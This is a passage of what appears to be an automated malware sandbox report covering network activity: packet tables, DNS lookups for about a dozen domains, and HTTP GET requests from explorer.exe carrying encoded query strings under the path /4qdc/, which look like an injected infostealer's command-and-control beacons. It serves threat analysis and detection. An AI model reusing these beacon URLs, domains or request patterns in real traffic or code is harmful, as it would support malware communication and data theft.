                                                                                                                        Feb 23, 2021 09:19:30.517585039 CET8049722208.91.197.27192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:30.517618895 CET8049722208.91.197.27192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:30.517644882 CET4972280192.168.2.3208.91.197.27
                                                                                                                        Feb 23, 2021 09:19:30.517679930 CET4972280192.168.2.3208.91.197.27
                                                                                                                        Feb 23, 2021 09:19:30.624599934 CET8049722208.91.197.27192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:30.624634981 CET8049722208.91.197.27192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:30.624664068 CET4972280192.168.2.3208.91.197.27
                                                                                                                        Feb 23, 2021 09:19:30.624696970 CET4972280192.168.2.3208.91.197.27
                                                                                                                        Feb 23, 2021 09:19:30.680015087 CET8049722208.91.197.27192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:30.680063009 CET4972280192.168.2.3208.91.197.27
                                                                                                                        Feb 23, 2021 09:19:35.726249933 CET4973580192.168.2.323.224.206.45
                                                                                                                        Feb 23, 2021 09:19:35.940552950 CET804973523.224.206.45192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:35.940700054 CET4973580192.168.2.323.224.206.45
                                                                                                                        Feb 23, 2021 09:19:35.940804005 CET4973580192.168.2.323.224.206.45
                                                                                                                        Feb 23, 2021 09:19:36.155071974 CET804973523.224.206.45192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:36.158428907 CET804973523.224.206.45192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:36.158538103 CET4973580192.168.2.323.224.206.45
                                                                                                                        Feb 23, 2021 09:19:36.158598900 CET4973580192.168.2.323.224.206.45
                                                                                                                        Feb 23, 2021 09:19:36.373198986 CET804973523.224.206.45192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:41.237212896 CET4974080192.168.2.334.102.136.180
                                                                                                                        Feb 23, 2021 09:19:41.278170109 CET804974034.102.136.180192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:41.279773951 CET4974080192.168.2.334.102.136.180
                                                                                                                        Feb 23, 2021 09:19:41.279925108 CET4974080192.168.2.334.102.136.180
                                                                                                                        Feb 23, 2021 09:19:41.321942091 CET804974034.102.136.180192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:41.421806097 CET804974034.102.136.180192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:41.421829939 CET804974034.102.136.180192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:41.421947956 CET4974080192.168.2.334.102.136.180
                                                                                                                        Feb 23, 2021 09:19:41.422008038 CET4974080192.168.2.334.102.136.180
                                                                                                                        Feb 23, 2021 09:19:41.462946892 CET804974034.102.136.180192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:46.514878035 CET4974680192.168.2.323.253.73.122
                                                                                                                        Feb 23, 2021 09:19:46.672138929 CET804974623.253.73.122192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:46.672233105 CET4974680192.168.2.323.253.73.122
                                                                                                                        Feb 23, 2021 09:19:46.672395945 CET4974680192.168.2.323.253.73.122
                                                                                                                        Feb 23, 2021 09:19:46.848619938 CET804974623.253.73.122192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:46.848833084 CET4974680192.168.2.323.253.73.122
                                                                                                                        Feb 23, 2021 09:19:46.901863098 CET4974680192.168.2.323.253.73.122
                                                                                                                        Feb 23, 2021 09:19:47.058953047 CET804974623.253.73.122192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:52.034972906 CET4974780192.168.2.334.102.136.180
                                                                                                                        Feb 23, 2021 09:19:52.075805902 CET804974734.102.136.180192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:52.075917006 CET4974780192.168.2.334.102.136.180
                                                                                                                        Feb 23, 2021 09:19:52.076121092 CET4974780192.168.2.334.102.136.180
                                                                                                                        Feb 23, 2021 09:19:52.118194103 CET804974734.102.136.180192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:52.215910912 CET804974734.102.136.180192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:52.215934992 CET804974734.102.136.180192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:52.216115952 CET4974780192.168.2.334.102.136.180
                                                                                                                        Feb 23, 2021 09:19:52.216259956 CET4974780192.168.2.334.102.136.180
                                                                                                                        Feb 23, 2021 09:19:52.257479906 CET804974734.102.136.180192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:57.300996065 CET4974880192.168.2.3104.21.76.239
                                                                                                                        Feb 23, 2021 09:19:57.362636089 CET8049748104.21.76.239192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:57.362773895 CET4974880192.168.2.3104.21.76.239
                                                                                                                        Feb 23, 2021 09:19:57.363087893 CET4974880192.168.2.3104.21.76.239
                                                                                                                        Feb 23, 2021 09:19:57.424618006 CET8049748104.21.76.239192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:57.433413982 CET8049748104.21.76.239192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:57.433438063 CET8049748104.21.76.239192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:57.433561087 CET4974880192.168.2.3104.21.76.239
                                                                                                                        Feb 23, 2021 09:19:57.433666945 CET4974880192.168.2.3104.21.76.239
                                                                                                                        Feb 23, 2021 09:19:57.495332003 CET8049748104.21.76.239192.168.2.3
                                                                                                                        Feb 23, 2021 09:20:07.753549099 CET4974980192.168.2.392.249.45.191
                                                                                                                        Feb 23, 2021 09:20:07.902614117 CET804974992.249.45.191192.168.2.3
                                                                                                                        Feb 23, 2021 09:20:07.902734041 CET4974980192.168.2.392.249.45.191
                                                                                                                        Feb 23, 2021 09:20:07.902918100 CET4974980192.168.2.392.249.45.191
                                                                                                                        Feb 23, 2021 09:20:08.052596092 CET804974992.249.45.191192.168.2.3
                                                                                                                        Feb 23, 2021 09:20:08.052963018 CET804974992.249.45.191192.168.2.3
                                                                                                                        Feb 23, 2021 09:20:08.052984953 CET804974992.249.45.191192.168.2.3
                                                                                                                        Feb 23, 2021 09:20:08.052998066 CET804974992.249.45.191192.168.2.3
                                                                                                                        Feb 23, 2021 09:20:08.053105116 CET4974980192.168.2.392.249.45.191
                                                                                                                        Feb 23, 2021 09:20:08.053309917 CET4974980192.168.2.392.249.45.191
                                                                                                                        Feb 23, 2021 09:20:08.053509951 CET804974992.249.45.191192.168.2.3
                                                                                                                        Feb 23, 2021 09:20:08.053587914 CET4974980192.168.2.392.249.45.191
                                                                                                                        Feb 23, 2021 09:20:08.204560995 CET804974992.249.45.191192.168.2.3

                                                                                                                        UDP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Feb 23, 2021 09:18:13.109071970 CET5062053192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:18:13.167468071 CET53506208.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:18:13.237102985 CET6493853192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:18:13.298345089 CET53649388.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:18:14.597481012 CET6015253192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:18:14.648981094 CET53601528.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:18:41.895658016 CET5754453192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:18:41.944113970 CET53575448.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:18:43.023251057 CET5598453192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:18:43.074654102 CET53559848.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:18:46.141314983 CET6418553192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:18:46.199933052 CET53641858.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:00.944809914 CET6511053192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:00.997602940 CET53651108.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:05.573760033 CET5836153192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:05.632469893 CET53583618.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:13.394813061 CET6349253192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:13.443514109 CET53634928.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:17.523621082 CET6083153192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:17.702505112 CET53608318.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:23.299504995 CET6010053192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:23.350155115 CET53601008.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:23.433437109 CET5319553192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:23.587986946 CET53531958.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:24.895694017 CET5014153192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:24.944336891 CET53501418.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:26.003376007 CET5302353192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:26.052035093 CET53530238.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:26.505979061 CET4956353192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:26.574804068 CET53495638.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:27.267761946 CET5135253192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:27.336662054 CET53513528.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:27.537915945 CET5934953192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:27.588455915 CET53593498.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:28.308531046 CET5708453192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:28.365628004 CET53570848.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:29.580148935 CET5882353192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:29.757343054 CET53588238.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:29.857853889 CET5756853192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:29.869638920 CET5054053192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:29.918586016 CET53575688.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:29.919332981 CET53505408.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:30.287633896 CET5436653192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:30.360156059 CET53543668.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:30.753460884 CET5303453192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:30.810342073 CET53530348.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:31.004024029 CET5776253192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:31.055495977 CET53577628.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:31.646888018 CET5543553192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:31.704104900 CET53554358.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:32.155848980 CET5071353192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:32.208286047 CET53507138.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:32.587729931 CET5613253192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:32.648315907 CET53561328.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:33.364005089 CET5898753192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:33.415467024 CET53589878.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:33.951195955 CET5657953192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:34.011198997 CET53565798.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:34.285038948 CET6063353192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:34.336524963 CET53606338.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:35.511317968 CET6129253192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:35.565466881 CET6361953192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:35.614231110 CET53636198.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:35.676973104 CET6493853192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:35.724052906 CET53612928.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:35.736579895 CET53649388.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:36.271919966 CET6194653192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:36.329251051 CET53619468.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:36.744668007 CET6491053192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:36.795408964 CET53649108.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:38.017047882 CET5212353192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:38.067193985 CET53521238.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:41.169655085 CET5613053192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:41.233515024 CET53561308.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:41.996720076 CET5633853192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:42.055108070 CET53563388.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:46.435403109 CET5942053192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:46.513928890 CET53594208.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:51.971105099 CET5878453192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:52.033718109 CET53587848.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:57.238603115 CET6397853192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:19:57.298604012 CET53639788.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:20:02.453564882 CET6293853192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:20:02.551256895 CET53629388.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:20:07.589055061 CET5570853192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:20:07.752645969 CET53557088.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:20:11.279791117 CET5680353192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:20:11.329194069 CET53568038.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:20:12.565169096 CET5714553192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:20:12.633227110 CET53571458.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:20:13.065254927 CET5535953192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:20:13.134967089 CET53553598.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:20:18.331641912 CET5830653192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:20:18.397118092 CET53583068.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:20:23.407660961 CET6412453192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:20:23.471493006 CET53641248.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:20:28.672559023 CET4936153192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:20:28.746814013 CET53493618.8.8.8192.168.2.3

                                                                                                                        DNS Queries

                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                        Feb 23, 2021 09:19:17.523621082 CET192.168.2.38.8.8.80x4959Standard query (0)www.pcareinc.comA (IP address)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:23.433437109 CET192.168.2.38.8.8.80xed74Standard query (0)www.antips.comA (IP address)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:29.580148935 CET192.168.2.38.8.8.80xe6cdStandard query (0)www.edgewooddhr.netA (IP address)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:35.511317968 CET192.168.2.38.8.8.80x2f8dStandard query (0)www.ndk168.comA (IP address)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:41.169655085 CET192.168.2.38.8.8.80x1787Standard query (0)www.inbarrel.comA (IP address)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:46.435403109 CET192.168.2.38.8.8.80xd783Standard query (0)www.39palmavenue.comA (IP address)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:51.971105099 CET192.168.2.38.8.8.80xa93cStandard query (0)www.buildassetswealth.comA (IP address)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:57.238603115 CET192.168.2.38.8.8.80x7ccbStandard query (0)www.beconfidentagain.comA (IP address)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:02.453564882 CET192.168.2.38.8.8.80x5690Standard query (0)www.torontotel.comA (IP address)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:07.589055061 CET192.168.2.38.8.8.80xc4d3Standard query (0)www.rehabcareconnect.comA (IP address)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:13.065254927 CET192.168.2.38.8.8.80x9ea2Standard query (0)www.speedysnacksbox.comA (IP address)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:18.331641912 CET192.168.2.38.8.8.80xa7f5Standard query (0)www.thepixxelgroup.comA (IP address)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:23.407660961 CET192.168.2.38.8.8.80xf8a1Standard query (0)www.havemercyinc.netA (IP address)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:28.672559023 CET192.168.2.38.8.8.80xf459Standard query (0)www.larek.storeA (IP address)IN (0x0001)

                                                                                                                        DNS Answers

                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                        Feb 23, 2021 09:19:17.702505112 CET8.8.8.8192.168.2.30x4959No error (0)www.pcareinc.com154.213.108.250A (IP address)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:23.587986946 CET8.8.8.8192.168.2.30xed74No error (0)www.antips.comHDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:23.587986946 CET8.8.8.8192.168.2.30xed74No error (0)HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com3.223.115.185A (IP address)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:29.757343054 CET8.8.8.8192.168.2.30xe6cdNo error (0)www.edgewooddhr.net208.91.197.27A (IP address)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:35.724052906 CET8.8.8.8192.168.2.30x2f8dNo error (0)www.ndk168.com23.224.206.45A (IP address)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:41.233515024 CET8.8.8.8192.168.2.30x1787No error (0)www.inbarrel.cominbarrel.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:41.233515024 CET8.8.8.8192.168.2.30x1787No error (0)inbarrel.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:46.513928890 CET8.8.8.8192.168.2.30xd783No error (0)www.39palmavenue.comsslplaform.bostonlogic.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:46.513928890 CET8.8.8.8192.168.2.30xd783No error (0)sslplaform.bostonlogic.comsequoia.bostonlogic.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:46.513928890 CET8.8.8.8192.168.2.30xd783No error (0)sequoia.bostonlogic.com23.253.73.122A (IP address)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:52.033718109 CET8.8.8.8192.168.2.30xa93cNo error (0)www.buildassetswealth.combuildassetswealth.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:52.033718109 CET8.8.8.8192.168.2.30xa93cNo error (0)buildassetswealth.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:57.298604012 CET8.8.8.8192.168.2.30x7ccbNo error (0)www.beconfidentagain.com104.21.76.239A (IP address)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:57.298604012 CET8.8.8.8192.168.2.30x7ccbNo error (0)www.beconfidentagain.com172.67.202.77A (IP address)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:02.551256895 CET8.8.8.8192.168.2.30x5690Name error (3)www.torontotel.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:07.752645969 CET8.8.8.8192.168.2.30xc4d3No error (0)www.rehabcareconnect.comrehabcareconnect.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:07.752645969 CET8.8.8.8192.168.2.30xc4d3No error (0)rehabcareconnect.com92.249.45.191A (IP address)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:13.134967089 CET8.8.8.8192.168.2.30x9ea2No error (0)www.speedysnacksbox.comspeedysnacksbox.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:13.134967089 CET8.8.8.8192.168.2.30x9ea2No error (0)speedysnacksbox.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:18.397118092 CET8.8.8.8192.168.2.30xa7f5Name error (3)www.thepixxelgroup.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:23.471493006 CET8.8.8.8192.168.2.30xf8a1No error (0)www.havemercyinc.nethavemercyinc.netCNAME (Canonical name)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:23.471493006 CET8.8.8.8192.168.2.30xf8a1No error (0)havemercyinc.net34.102.136.180A (IP address)IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:28.746814013 CET8.8.8.8192.168.2.30xf459No error (0)www.larek.store185.104.45.146A (IP address)IN (0x0001)

                                                                                                                        HTTP Request Dependency Graph

                                                                                                                        • www.pcareinc.com
                                                                                                                        • www.antips.com
                                                                                                                        • www.edgewooddhr.net
                                                                                                                        • www.ndk168.com
                                                                                                                        • www.inbarrel.com
                                                                                                                        • www.39palmavenue.com
                                                                                                                        • www.buildassetswealth.com
                                                                                                                        • www.beconfidentagain.com
                                                                                                                        • www.rehabcareconnect.com
                                                                                                                        • www.speedysnacksbox.com
                                                                                                                        • www.havemercyinc.net

                                                                                                                        HTTP Packets

                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        0192.168.2.349713154.213.108.25080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Feb 23, 2021 09:19:18.058295012 CET1018OUTGET /4qdc/?sxlpdB=n05rnph+IqNz0mbSS5vp9sGjLY7dyqnysY607r4vHHjCLr3ziiRBE07QjlPjM5GqarqD&2dz=onbha HTTP/1.1
                                                                                                                        Host: www.pcareinc.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        1192.168.2.3497153.223.115.18580C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Feb 23, 2021 09:19:23.717447996 CET1021OUTGET /4qdc/?sxlpdB=FDPsk0sff5Lw+z8Vw8rcgpm8MWqJfMs2bvH8+cW5/POI2TSyhlXdRmW8g+C2mzqgUbJY&2dz=onbha HTTP/1.1
                                                                                                                        Host: www.antips.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Feb 23, 2021 09:19:23.844760895 CET1026INHTTP/1.1 302 Found
                                                                                                                        Cache-Control: private
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Location: https://www.hugedomains.com/domain_profile.cfm?d=antips&e=com
                                                                                                                        Server: Microsoft-IIS/8.5
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        Date: Tue, 23 Feb 2021 08:19:02 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 182
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 75 67 65 64 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 70 72 6f 66 69 6c 65 2e 63 66 6d 3f 64 3d 61 6e 74 69 70 73 26 61 6d 70 3b 65 3d 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.hugedomains.com/domain_profile.cfm?d=antips&amp;e=com">here</a>.</h2></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        10192.168.2.34975334.102.136.18080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Feb 23, 2021 09:20:23.514893055 CET6424OUTGET /4qdc/?sxlpdB=o1YYd6Gi2K67gelLAX14ago2MHBzIaWFdtb1Ca8ijRLt6mEmIsAV47qF7pv8e7ASo7Rk&2dz=onbha HTTP/1.1
                                                                                                                        Host: www.havemercyinc.net
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Feb 23, 2021 09:20:23.654359102 CET6425INHTTP/1.1 403 Forbidden
                                                                                                                        Server: openresty
                                                                                                                        Date: Tue, 23 Feb 2021 08:20:23 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 275
                                                                                                                        ETag: "603153c4-113"
                                                                                                                        Via: 1.1 google
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        2192.168.2.349722208.91.197.2780C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Feb 23, 2021 09:19:29.946145058 CET1250OUTGET /4qdc/?sxlpdB=+7VgHCQQJYO0FHfoX4VwpMGRpMkf/fkwbCKrV3wMZoe5nkwvpaAzoW+aSblNd7Hd+wjC&2dz=onbha HTTP/1.1
                                                                                                                        Host: www.edgewooddhr.net
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Feb 23, 2021 09:19:30.277334929 CET1282INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 23 Feb 2021 08:19:30 GMT
                                                                                                                        Server: Apache
                                                                                                                        Set-Cookie: vsid=918vr3616139700809367; expires=Sun, 22-Feb-2026 08:19:30 GMT; Max-Age=157680000; path=/; domain=www.edgewooddhr.net; HttpOnly
                                                                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_hYI5FgRivm97L0ZhxJZJHb6tu9340hOnvoCgyVNLxugqNGFCB7mbeB8pbBQwYrXBInZ2FL1RynS3GR30enIkxQ==
                                                                                                                        Keep-Alive: timeout=5, max=97
